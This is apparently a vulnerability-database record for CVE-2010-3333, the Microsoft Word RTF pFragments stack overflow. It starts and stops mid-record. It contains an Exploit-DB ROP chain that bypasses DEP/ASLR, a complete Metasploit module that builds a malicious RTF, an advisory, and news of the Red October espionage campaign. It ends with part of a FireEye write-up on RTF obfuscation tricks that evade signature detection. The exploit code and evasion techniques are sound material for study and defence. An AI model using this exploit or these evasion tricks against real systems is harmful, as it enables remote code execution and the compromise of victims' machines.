x\r\n\t\t\tx = rand(9)\r\n\t\tend\r\n\t\tx\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16686/"}, {"lastseen": "2016-02-02T07:56:11", "description": "Microsoft Office 2010 - RTF Header Stack Overflow Vulnerability Exploit. CVE-2010-3333. Local exploit for windows platform", "published": "2011-07-03T00:00:00", "type": "exploitdb", "title": "Microsoft Office 2010 - RTF Header Stack Overflow Vulnerability Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2011-07-03T00:00:00", "id": "EDB-ID:17474", "href": "https://www.exploit-db.com/exploits/17474/", "sourceData": "# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability\r\nExploit\r\n# Date: 7/3/2011\r\n# Author: Snake ( Shahriyar.j < at > gmail )\r\n# Version: MS Office <= 2010\r\n# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7\r\n# CVE : CVE-2010-3333\r\n\r\n# This is the exploit I wrote for Abysssec \"The Arashi\" article.\r\n# It gracefully bypass DEP/ASLR in MS Office 2010,\r\n# and we named this method \"Ikazuchi DEP/ASRL Bypass\" : >\r\n# unfortunately msgr3en.dll loads a few seconds after opining office,\r\n# so just need to open open Office , and then open exploit after a few second and saw a nice calc.\r\n#\r\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\r\n# http://www.exploit-db.com/docs/17469.pdf\r\n#\r\n# me : twitter.com/ponez\r\n# aslo check here for Persian docs of this methods and more :\r\n# http://www.0days.ir/article/\r\n\r\n\r\n\r\n#\r\n# and the Rop :\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # HeapCreate() IAT = 3F10115C\r\n\r\n3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # EAX == HeapCreate() Address\r\n\r\n3F39AFCF CALL EAX\r\n RETN\r\n # Call HeapCreate() and Create a Executable Heap :D\r\n # after this call, EAX contain our Heap Address.\r\n\r\n0x3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x00008000 into 
ECX\r\n\r\n0x3F39CB46 ADD EAX,ECX\r\n POP ESI\r\n RETN\r\n # add ECX to EAX and instead of calling HeapAlloc,\r\n # now EAX point to the RWX Heap :D\r\n\r\n0x3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 into ECX, it is a writable address.\r\n\r\n0x3F2233CC MOV DWORD PTR DS:[ECX],EAX\r\n RETN\r\n # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for\r\nfurther use ;)\r\n\r\n0x3F2D59DF POP EAX\r\n ADD DWORD PTR DS:[EAX],ESP\r\n RETN\r\n # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\r\n # then we add ESP to the Zero which result in storing ESP into\r\nthat address,\r\n # we need ESP address for copying shellcode ( which stores in\r\nStack ),\r\n # and we have to get it dynamically at run-time, now with my\r\ntricky instruction, we have it!\r\n\r\n\r\n0x3F2F18CC POP EAX\r\n RETN\r\n # pop 0x3F3B3DC4 ( ESP address ) into EAX\r\n\r\n\r\n0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]\r\n RETN\r\n # now ECX point to nearly offset of Stack.\r\n\r\n0x3F39795E POP EDX\r\n RETN\r\n # pop 0x00000024 into EDX\r\n\r\n0x3F39CB44 ADD ECX,EDX\r\n ADD EAX,ECX\r\n POP ESI\r\n RETN\r\n # add 0x24 to ECX ( Stack address )\r\n\r\n0x3F398267 MOV EAX,ECX\r\n RETN\r\n # EAX = ECX ; )\r\n\r\n0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX\r\n XOR EAX,EAX\r\n POP ESI\r\n RETN\r\n # mov EAX ( Stack Address + 24 = Current ESP value ) into the\r\ncurrent Stack Location,\r\n # and the popping it into ESI ! 
now ESI points to where the shellcode\r\nis stored on the stack :D\r\n\r\n0x3F398267 MOV EAX,ECX\r\n RETN\r\n # EAX = ECX ; )\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n\r\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # now EAX points to our RWX Heap\r\n\r\n0x3F2B0A7C XCHG EAX,EDI\r\n RETN 4\r\n # EDI = Our RWX Heap Address\r\n\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n \r\n\r\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # now EAX points to our RWX Heap\r\n\r\n0x3F38BEFB ADD AL,58\r\n RETN\r\n # just skip some junk ; )\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy length )\r\n\r\n3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]\r\n POP EDI\r\n POP ESI\r\n RETN\r\n # Copy shellcode from stack into RWX Heap\r\n\r\n\r\n3F39AFCF CALL EAX\r\n RETN\r\n # KABOOM !!!\r\n\r\n\r\n\r\n\r\n\r\nExploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17474/"}], "seebug": [{"lastseen": "2017-11-19T18:07:08", "description": "BUGTRAQ ID: 44652\r\nCVE ID: CVE-2010-3333\r\n\r\nWord is the word-processing tool in the Microsoft Office suite.\r\n\r\nWhen handling certain control words in an RTF document, Word copies their property strings into a stack buffer without performing a length check, which can trigger a stack overflow. An attacker who successfully exploits this vulnerability can take complete control of the affected system.\r\n\r\nMicrosoft Office XP SP3\r\nMicrosoft Office for Mac 2011\r\nMicrosoft Office 2010\r\nMicrosoft
Office 2008 for Mac\r\nMicrosoft Office 2007 SP2\r\nMicrosoft Office 2004 for Mac\r\nMicrosoft Office 2003 Service Pack 3\r\nTemporary workaround:\r\n\r\n* Do not open or save Microsoft Office files that come from untrusted sources or that arrive unexpectedly from trusted sources.\r\n\r\nVendor patch:\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft has released a security bulletin (MS10-087) and the corresponding patch for this issue:\r\nMS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)\r\nLink: http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx?pf=true", "published": "2010-11-17T00:00:00", "type": "seebug", "title": "Microsoft Word RTF File Parsing Stack Overflow Vulnerability (MS10-087)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2010-11-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20246", "id": "SSV:20246", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-06-27T20:07:27", "description": "This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well.
It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that Microsoft will confirm or deny this since Office 2000 has reached its support cycle end-of-life.\n", "published": "2010-12-29T20:30:50", "type": "metasploit", "title": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS10_087_RTF_PFRAGMENTS_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. 
It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'wushi of team509', # original discovery\n 'unknown', # exploit found in the wild\n 'jduck', # Metasploit module\n 'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz\n ],\n 'References' =>\n [\n [ 'CVE', '2010-3333' ],\n [ 'OSVDB', '69085' ],\n [ 'MSB', 'MS10-087' ],\n [ 'BID', '44652' ],\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true # no need\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # This automatic target will combine all targets into one file :)\n [ 'Automatic', { } ],\n\n # Office v10.6854.6845, winword.exe v10.0.6854.0\n [ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',\n {\n 'Offsets' => [ 23532, 45944 ],\n #'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0\n 'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0\n }\n ],\n\n # Office v11.8307.8324, winword.exe v11.0.8307.0\n # Office v11.8328.8221, winword.exe v11.0.8328.0\n [ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',\n {\n 'Offsets' => [ 24580, 51156 ],\n 'Ret' => 0x30001bdd # p/p/r in winword.exe\n }\n ],\n\n # In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.\n\n # Office v12.0.6425.1000, winword.exe v12.0.6425.1000\n [ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',\n {\n 'Offsets' => [ 5956 ],\n 'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record\n }\n ],\n\n [ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',\n {\n 'Offsets' => [ 5956 ],\n 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. 
say word.\n }\n ],\n\n [ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',\n {\n 'Offsets' => [ 5956 ],\n 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.\n }\n ],\n\n\n # crash on a deref path to heaven.\n [ 'Crash Target for Debugging',\n {\n 'Offsets' => [ 65535 ],\n 'Ret' => 0xdac0ffee\n }\n ]\n ],\n 'DisclosureDate' => 'Nov 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),\n ])\n end\n\n def add_target(rest, targ)\n targ['Offsets'].each { |off|\n seh = generate_seh_record(targ.ret)\n rest[off, seh.length] = seh\n distance = off + seh.length\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n rest[off + seh.length, jmp_back.length] = jmp_back\n }\n end\n\n def exploit\n\n # Prepare a sample SEH frame and backward jmp for length calculations\n seh = generate_seh_record(0xdeadbeef)\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-0xffff\").encode_string\n\n # RTF property Array parameters\n el_size = sz_rand()\n el_count = sz_rand()\n\n data = ''\n # These words are presumably incorrectly used\n # assert(amount1 <= amount2)\n data << [0x1111].pack('v') * 2\n data << [0xc8ac].pack('v')\n\n # Filler\n if target.name =~ /Debug/i\n rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)\n else\n len = 51200 + rand(1000)\n rest = rand_text(len + seh.length + jmp_back.length)\n rest[0, payload.encoded.length] = payload.encoded\n end\n\n # Stick fake SEH frames here and there ;)\n if target.name == \"Automatic\"\n targets.each { |t|\n next if t.name !~ /Windows/i\n\n add_target(rest, t)\n }\n else\n add_target(rest, target)\n end\n\n # Craft the array for the property value\n sploit = \"%d;%d;\" % [el_size, el_count]\n sploit << data.unpack('H*').first\n sploit << rest.unpack('H*').first\n\n # Assemble it all into a nice RTF\n content = \"{\\\\rtf1\"\n content << 
\"{\\\\shp\" # shape\n content << \"{\\\\sp\" # shape property\n content << \"{\\\\sn pFragments}\" # property name\n content << \"{\\\\sv #{sploit}}\" # property value\n content << \"}\"\n content << \"}\"\n content << \"}\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(content)\n\n end\n\n def sz_rand\n bad_sizes = [ 0, 2, 4, 8 ]\n x = rand(9)\n while bad_sizes.include? x\n x = rand(9)\n end\n x\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb"}], "thn": [{"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2009-3129"], "description": "A sensational new discovery has been announced by Kaspersky Lab\u2019s Global Research & Analysis Team as the result of an investigation that followed several attacks on the computer networks of various international diplomatic service agencies.\n\n[](<http://3.bp.blogspot.com/-oLHA29NAIM8/UPUy7lMIn9I/AAAAAAAAAI4/5CzgGdxDSeU/s1600/Red+October+Operation.png>)\n\nA new large-scale [cyber-espionage](<http://securityaffairs.co/wordpress/11405/intelligence/cyberespionage-another-watering-hole-attack-against-us-website.html>) operation has been discovered, named **Red October**, a name inspired by the famous novel **The Hunt For The Red October (ROCRA)** and chosen because the investigation started last October.\n\n \n\n\nThe campaign hit hundreds of machines belonging to the following categories:\n\n * Government\n * Diplomatic / embassies\n * Research institutions\n * Trade and commerce\n * Nuclear / energy research\n * Oil and gas companies\n * Aerospace\n * Military\n\nThe attackers have targeted various devices such as enterprise network equipment and mobile devices (Windows Mobile, iPhone, Nokia), hijacking files from removable disk drives, stealing e-mail databases from local Outlook storage or
remote POP/IMAP servers and siphoning files from local network FTP servers.\n\n \n \n\n\nAccording to the security experts involved in the investigation, the cyber-espionage campaign has been running since 2007 and is still active; during this long period the attackers obtained a huge quantity of information, such as service credentials that have been reused in later attacks.\n\n \n\n\nThe control structure discovered is very complex and extensive: more than 60 domain names and several hosting servers located in many countries, mainly Germany and Russia. A particularity of the C&C architecture is that the network is arranged to hide the true mothership server behind the proxy functionality of every node in the malicious structure.\n\n \n\n\nSecurity experts were able to sinkhole six of the 60 domains used during the period 2 Nov 2012 - 10 Jan 2013, registering over 55,000 connections to the sinkhole from 250 different victim IPs in 39 different countries, with most of the IPs being from Switzerland; Kazakhstan and Greece follow next.\n\n[](<http://3.bp.blogspot.com/-2eJDE126xVU/UPUzWdD6aII/AAAAAAAAAJA/bK4zpvEs7WA/s1600/Red+October+Operation.png>)\n\n**Red October Geo-distribution of victims**\n\nWhich vulnerabilities were exploited for the attacks?\n\nThe security experts discovered that at least three different known vulnerabilities have been exploited:\n\n * CVE-2009-3129 (MS Excel) [attacks dated 2010 and 21011]\n * CVE-2010-3333 (MS Word) [attacks conducted in the summer of 2012]\n * CVE-2012-0158 (MS Word) [attacks conducted in the summer of 2012]\n\nEvidence collected during the investigation led security specialists to believe that the attackers have Russian origins, but strangely they appear unrelated to any other cyber attacks detected until now. The exploits appear to have been created by Chinese hackers.\n\n \n\n\n**Attack Method**\n\nThese attacks are structured in two distinct phases, following a classic schema for targeted attacks:\n\n 1. Initial infection\n 2.
Additional modules deployed for intelligence gathering\n\nIn the initial phase the malware is delivered via e-mail as attachments (Microsoft Excel, Word and probably PDF documents). Once a victim opened the malicious document, the embedded malicious code initiated the setup of the main component, which in turn handled further communication with the C&C servers; the malware then received a number of additional spy modules from the C&C server. \n \n\n\nThe way the entire network is infected is very efficient: the hackers used a module to scan the target infrastructure for vulnerable machines. The attacks against each machine and its related services are made by exploiting the above vulnerabilities or by gaining access with credentials collected during other attacks of the same campaign. The exploits appear to have been created by Chinese hackers. \n \n\n\nWhat alarms me is that such campaigns could be going on for years with disastrous consequences ... _what to do at this point? How is it possible that an operation so extensive escaped the worldwide security community for so long? Who is behind the attacks? Cyber criminals or state-sponsored hackers?_\n\n \n\n\n**UPDATE 2013/01/15**\n\nJeffrey Carr, founder and CEO of Taia Global, Inc, posted on [his blog](<http://jeffreycarr.blogspot.it/2013/01/rbn-connection-to-kasperskys-red.html>):\n\n \n\n\nThe developers behind ROCRA, who are Russian, are comfortable using Chinese malware and adapting it for their own use according to the Kaspersky report. This fits the RBN profile to a \u2018t\u2019.
I ran 13 IPs listed in Kaspersky\u2019s report against the [RBN list](<http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt>) maintained by James McQuade and found matching IP blocks for five of them:\n\n \n\n\n**Malicious servers**\n\n * 178.63.208.49 matches to 178.63.\n * 188.40.19.247 matches to 188.40.\n * 78.46.173.15 matches to 78.46.\n * 88.198.30.44 matches to 88.198.\n\n**Mini-motherships**\n\n * 91.226.31.40 matches to 91.226.\n\nIt has been my belief for many years that the RBN has a working relationship with the Russian government; that it disappeared from view when the FBI sought the assistance of the FSB to shut down their operations in 2007 (as detailed in chapter 8 of my book); and that it has continued operating below the radar all this time. It provides distance and deniability to the FSB for certain offensive cyber operations and, in exchange, the FSB allows the RBN to operate as a criminal enterprise; a portion of which involves selling the data that it steals to whomever is interested. Red October is already the most significant find of the new year.
If, in fact, Kaspersky has uncovered an RBN-controlled espionage ring, it\u2019s going to be one of the most important discoveries of the decade.\n", "modified": "2013-10-14T11:49:51", "published": "2013-01-14T23:49:00", "id": "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "href": "http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html", "type": "thn", "title": "Operation Red October : Cyber Espionage campaign against many Governments", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:50", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883", "CVE-2010-3333", "CVE-2012-4681"], "description": "None\n", "modified": "2013-12-13T14:02:26", "published": "2013-12-13T02:59:00", "id": "THN:3BF9400C51248462741DFA3EAF706DEE", "href": "https://thehackernews.com/2013/12/chinese-hackers-spied-on-european.html", "type": "thn", "title": "Chinese Hackers spied on European Diplomats during recent G20 meetings", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parser challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. 
Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature-based detection such as YARA or Snort rules. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs.\n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple of different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability is that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. 
Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so the threat it posed was very high.\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}}\n\nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of signature-based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature-based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. 
The following example demonstrates this obfuscation:\n\n| Obfuscated | {\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} |\n|---|---|\n| Clear | {\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} |\n\nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature-based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed a variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE-related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n| <data> | (\\binN #BDATA) \\| #SDATA |\n|---|---|\n| #BDATA | Binary data |\n| #SDATA | Hexadecimal data |\n\nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\n
a. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the digits 123 will be treated as binary data and hence translated into the hex values 313233 in memory.\n\n| Obfuscated | {\\object\\objocx\\objdata \\bin3 123} |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 313233} |\n\nLet\u2019s look at another example:\n\n| Obfuscated | {\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123} |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 313233} |\n\nIf we try to call atoi or atol with the oversized numeric parameter string in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The whitespace characters 0x0D (\\r), 0x0A (\\n) and 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\'hh. 
Let\u2019s look into an example first:\n\n| Obfuscated | {\\object\\objocx\\objdata 341\\'112345 } |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 342345} |\n\nWhen parsing \\'11, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\'11 has also been discarded: once the RTF parser has parsed the 1 right before \\'11, which is the higher 4 bits of an octet, and then immediately encounters \\'11, those higher 4 bits are discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure; the two 1s that come from \\'11 are the ones that matter. It\u2019s clear that the interleaved \\'11 disturbs the state variable, which causes the higher 4 bits of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and that the numeric parameter associated with the control word must be a signed 16-bit or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. Characters beyond the maximum buffer length (0xFF) do not remain part of the control word or parameter string; instead, the control word or parameter is terminated there.\n\n\n\nIn the first obfuscated example, the length of the oversized control word is 0xFE. 
By adding a null terminator, the control word string reaches the maximum length of 0xFF, and the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null terminators, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\n| Obfuscated | {\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR {\\object\\objocx\\objdata 554445\\objdata 444454545} OR {\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 444454545} |\n\nAs we can see here, except for \\binN, other control words are ignored:\n\n| Obfuscated | {\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR {\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR {\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR {\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR {\\object\\objocx\\objdata 44444444\\unknown2211 55556666} |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 4444444455556666} |\n\nThere is another special case that makes the situation a bit more complicated: the control symbol \\\\*. From the RTF specification, we can get the description of [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. 
